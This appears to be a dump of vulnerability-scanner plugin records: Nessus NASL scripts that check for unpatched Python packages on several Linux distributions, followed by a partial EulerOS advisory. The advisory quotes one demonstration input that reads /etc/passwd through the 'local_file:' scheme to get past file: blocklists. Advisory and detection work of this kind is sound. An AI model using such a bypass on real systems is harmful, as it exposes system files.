(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-24T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : python (ELSA-2015-2101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:python", "p-cpe:/a:oracle:linux:python-debug", "p-cpe:/a:oracle:linux:python-devel", "p-cpe:/a:oracle:linux:python-libs", "p-cpe:/a:oracle:linux:python-test", "p-cpe:/a:oracle:linux:python-tools", "p-cpe:/a:oracle:linux:tkinter", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# Oracle Linux Security Advisory ELSA-2015-2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87020);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"Oracle Linux 7 : python (ELSA-2015-2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2101 
:\n\nUpdated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. 
(CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. 
(BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-test\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.0.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-19T16:08:25", "description": "The remote host is affected by the vulnerability described in GLSA-201503-10 (Python: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Python. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A context-dependent attacker may be able to execute arbitrary code or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-03-24T00:00:00", "type": "nessus", "title": "GLSA-201503-10 : Python: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-7338", "CVE-2014-1912", "CVE-2014-2667", "CVE-2014-4616", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:python", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201503-10.NASL", "href": "https://www.tenable.com/plugins/nessus/82009", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201503-10.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82009);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_xref(name:\"GLSA\", value:\"201503-10\");\n\n script_name(english:\"GLSA-201503-10 : Python: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201503-10\n(Python: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Python. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A context-dependent attacker may be able to execute arbitrary code or\n cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201503-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Python 3.3 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/python-3.3.5-r1'\n All Python 2.7 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/python-2.7.9-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/python\", unaffected:make_list(\"ge 3.3.5-r1\", \"ge 2.7.9-r1\"), vulnerable:make_list(\"lt 3.3.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Python\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:46:32", "description": "Updated python packages fix security vulnerabilities :\n\nA vulnerability was reported in Python's socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. 
This could be used to crash a Python application that uses the socket.recvfrom_into() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912).\n\nThis updates the python package to version 2.7.6, which fixes several other bugs, including denial of service flaws due to unbound readline() calls in the ftplib and nntplib modules (CVE-2013-1752).\n\nDenial of service flaws due to unbound readline() calls in the imaplib, poplib, and smtplib modules (CVE-2013-1752).\n\nA gzip bomb and unbound read denial of service flaw in python XMLRPC library (CVE-2013-1753).\n\nPython is susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used as an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root (CVE-2014-4650).\n\nPython before 2.7.8 is vulnerable to an integer overflow in the buffer type (CVE-2014-7185).\n\nWhen Python's standard library HTTP clients (httplib, urllib, urllib2, xmlrpclib) are used to access resources with HTTPS, by default the certificate is not checked against any trust store, nor is the hostname in the certificate checked against the requested host.
It was possible to configure a trust root to be checked against, however there were no facilities for hostname checking (CVE-2014-9365).\n\nThe python-pip and tix packages were added due to missing build dependencies.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : python (MDVSA-2015:075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64python-devel", "p-cpe:/a:mandriva:linux:lib64python2.7", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python-pip", "p-cpe:/a:mandriva:linux:python3-pip", "p-cpe:/a:mandriva:linux:tix", "p-cpe:/a:mandriva:linux:tix-devel", "p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:tkinter-apps", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-075.NASL", "href": "https://www.tenable.com/plugins/nessus/82328", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:075.
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82328);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-1912\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_xref(name:\"MDVSA\", value:\"2015:075\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2015:075)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages fix security vulnerabilities :\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nThis updates the python package to version 2.7.6, which fixes several\nother bugs, including denial of service flaws due to unbound\nreadline() calls in the ftplib and nntplib modules (CVE-2013-1752).\n\nDenial of service flaws due to unbound readline() calls in the\nimaplib, poplib, and smtplib modules (CVE-2013-1752).\n\nA gzip bomb and unbound read denial of service flaw in python XMLRPC\nlibrary (CVE-2013-1753).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. 
The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\n\nPython before 2.7.8 is vulnerable to an integer overflow in the buffer\ntype (CVE-2014-7185).\n\nWhen Python's standard library HTTP clients (httplib, urllib, urllib2,\nxmlrpclib) are used to access resources with HTTPS, by default the\ncertificate is not checked against any trust store, nor is the\nhostname in the certificate checked against the requested host. It was\npossible to configure a trust root to be checked against, however\nthere were no faculties for hostname checking (CVE-2014-9365).\n\nThe python-pip and tix packages was added due to missing build\ndependencies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0139.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0399.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-pip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-pip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 
audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python-docs-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python-pip-1.4.1-4.2.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"python3-pip-1.4.1-4.2.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tix-8.4.3-9.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tix-devel-8.4.3-9.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter-2.7.9-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.9-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:22:33", "description": "According to the versions of the python packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that Python's smtplib library did not return an exception when StartTLS failed to be established in the SMTP.starttls() function. 
A man in the middle attacker could strip out the STARTTLS command without generating an exception on the Python SMTP client application, preventing the establishment of the TLS layer.(CVE-2016-0772)\n\n - A vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later 'import' statement could cause a heap overflow, leading to arbitrary code execution.(CVE-2016-5636)\n\n - A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.(CVE-2016-2183)\n\n - The Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers.\n A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data.(CVE-2014-9365)\n\n - An integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.(CVE-2014-7185)\n\n - A flaw was found in the way catastrophic backtracking was implemented in python's pop3lib's apop() method. 
An attacker could use this flaw to cause denial of service.(CVE-2018-1060)\n\n - The ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.(CVE-2013-4238)\n\n - It was found that the Python's httplib library (used by urllib, urllib2 and others) did not properly check HTTPConnection.putheader() function arguments. An attacker could use this flaw to inject additional headers in a Python application that allowed user provided header names or values.(CVE-2016-5699)\n\n - CPython (aka Python) up to 2.7.13 is vulnerable to an integer overflow in the PyString_DecodeEscape function in stringobject.c, resulting in heap-based buffer overflow (and possible arbitrary code execution)(CVE-2017-1000158)\n\n - A flaw was found in the way catastrophic backtracking was implemented in python's difflib.IS_LINE_JUNK method. An attacker could use this flaw to cause denial of service.(CVE-2018-1061)\n\n - It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.(CVE-2013-1752)\n\n - A flaw was found in the way the json module handled negative index argument passed to certain functions (such as raw_decode()). 
An attacker able to control index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory.(CVE-2014-4616)\n\n - urllib in Python 2.x through 2.7.16 supports the local_file: scheme, which makes it easier for remote attackers to bypass protection mechanisms that blacklist file: URIs, as demonstrated by triggering a urllib.urlopen('local_file:///etc/passwd') call.(CVE-2019-9948)\n\n - Python's elementtree C accelerator failed to initialise Expat's hash salt during initialization. This could make it easy to conduct denial of service attacks against Expat by constructing an XML document that would cause pathological hash collisions in Expat's internal data structures, consuming large amounts of CPU and RAM.(CVE-2018-14647)\n\n - A null pointer dereference vulnerability was found in the certificate parsing code in Python. This causes a denial of service to applications when parsing specially crafted certificates. This vulnerability is unlikely to be triggered if application enables SSL/TLS certificate validation and accepts certificates only from trusted root certificate authorities.(CVE-2019-5010)\n\n - Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization.\n The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.(CVE-2019-9636)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
